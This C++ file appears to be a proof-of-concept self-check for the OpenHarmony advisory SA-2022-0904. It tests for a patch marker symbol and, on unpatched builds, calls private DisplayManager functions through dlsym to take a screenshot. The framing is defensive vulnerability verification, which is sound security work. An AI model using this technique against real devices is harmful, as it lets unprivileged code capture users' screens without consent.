1 /*
2 * Copyright (c) 2023 Huawei Device Co., Ltd.
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16 #include <dlfcn.h>
17 #include <memory>
18 #include <stdio.h>
19 #include <unistd.h>
// Opaque forward declaration. This file only ever names PixelMap inside
// std::shared_ptr<Media::PixelMap>, so an incomplete type is sufficient and
// no project header has to be pulled in.
namespace Media { class PixelMap; }
23
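// On-device self-check for advisory OpenHarmony-SA-2022-0904.
//
// Step 1 looks up DisplayManagerStub::IsStartByHdcd in libdms.z.so. The
//        program treats a missing symbol as "vulnerable" and a present one as
//        "not vulnerable". This is a symbol-presence heuristic only: a build
//        that fixes the issue differently, or strips/renames the symbol, would
//        be misreported, so confirm the verdict against the installed version.
// Step 2 runs only when the symbol is missing. It resolves
//        DisplayManager::GetInstance, GetDefaultDisplayId and GetScreenshot
//        from libdm.z.so, calls them, and prints the display id and whether a
//        PixelMap came back.
//
// Exit status: 0 when step 2 ran to the end; 1 when a library or symbol could
// not be resolved, and also when the build is reported as not vulnerable.
//
// NOTE(review): both library paths are hard-coded to /system/lib, and the
// mangled GetScreenshot name ends in 'y' (unsigned long long), which matches
// targets where uint64_t is unsigned long long. On other images a load or
// lookup failure in step 2 says nothing about whether the device is affected.
int main() {
    // Owns a dlopen() handle and dlclose()s it on every return path. The
    // original leaked the libdms handle everywhere and the libdm handle on
    // the success path.
    using Library = std::unique_ptr<void, int (*)(void*)>;

    // All-ones is the value this program treats as "no default display".
    constexpr uint64_t kInvalidDisplayId = ~0ULL;

    // ---- Step 1: marker-symbol check in libdms.z.so -----------------------
    Library dms{dlopen("/system/lib/libdms.z.so", RTLD_LAZY), &dlclose};
    if (!dms) {
        fprintf(stderr, "Error: %s\n", dlerror());
        return 1;
    }

    // Only the presence of the symbol is tested; it is never called.
    const void* const markerSymbol =
        dlsym(dms.get(), "_ZN4OHOS5Rosen18DisplayManagerStub13IsStartByHdcdEv");
    if (markerSymbol != nullptr) {
        printf("OpenHarmony-SA-2022-0904: not vulnerable!\n");
        return 1;
    }
    printf("OpenHarmony-SA-2022-0904: vulnerable!\n");

    // ---- Step 2: confirm the behaviour through libdm.z.so -----------------
    Library dm{dlopen("/system/lib/libdm.z.so", RTLD_LAZY), &dlclose};
    if (!dm) {
        fprintf(stderr, "Error: %s\n", dlerror());
        return 1;
    }

    // DisplayManager::GetInstance, called as a plain function returning the
    // object address.
    using GetInstanceFn = void* (*)();
    const auto getInstance = reinterpret_cast<GetInstanceFn>(
        dlsym(dm.get(), "_ZN4OHOS5Rosen14DisplayManager11GetInstanceEv"));
    if (getInstance == nullptr) {
        fprintf(stderr, "Error: %s\n", dlerror());
        return 1;
    }
    // NOTE(review): the result is used as `this` below without a null check;
    // presumably GetInstance always yields a singleton - confirm.
    void* const displayManager = getInstance();

    // DisplayManager::GetDefaultDisplayId, with `this` passed explicitly as
    // the first argument.
    using GetDefaultDisplayIdFn = uint64_t (*)(void*);
    const auto getDefaultDisplayId = reinterpret_cast<GetDefaultDisplayIdFn>(
        dlsym(dm.get(), "_ZN4OHOS5Rosen14DisplayManager19GetDefaultDisplayIdEv"));
    if (getDefaultDisplayId == nullptr) {
        fprintf(stderr, "Error: %s\n", dlerror());
        return 1;
    }

    const uint64_t displayId = getDefaultDisplayId(displayManager);
    if (displayId == kInvalidDisplayId) {
        // Not fatal: as in the original flow, the screenshot call below is
        // still attempted with this id.
        printf("GetDefaultDisplayId failed!\n");
    } else {
        // %llu expects unsigned long long; uint64_t is unsigned long on LP64
        // targets, so convert explicitly instead of relying on the typedef.
        printf("DisplayId: %llu\n", static_cast<unsigned long long>(displayId));
    }

    // DisplayManager::GetScreenshot(displayId).
    using GetScreenshotFn = std::shared_ptr<Media::PixelMap> (*)(void*, uint64_t);
    const auto getScreenshot = reinterpret_cast<GetScreenshotFn>(
        dlsym(dm.get(), "_ZN4OHOS5Rosen14DisplayManager13GetScreenshotEy"));
    if (getScreenshot == nullptr) {
        fprintf(stderr, "Error: %s\n", dlerror());
        return 1;
    }

    // Keep the returned shared_ptr alive while its address is reported. The
    // original called .get() on the temporary, so the printed pointer referred
    // to an object that had already been released. Declared after `dm`, so it
    // is destroyed before the library is unloaded.
    const std::shared_ptr<Media::PixelMap> pixelMap =
        getScreenshot(displayManager, displayId);
    if (pixelMap == nullptr) {
        printf("GetPixelMap failed!\n");
    } else {
        printf("PixelMap: %p\n", static_cast<void*>(pixelMap.get()));
    }

    // pixelMap, then libdm, then libdms are released here by their destructors.
    return 0;
}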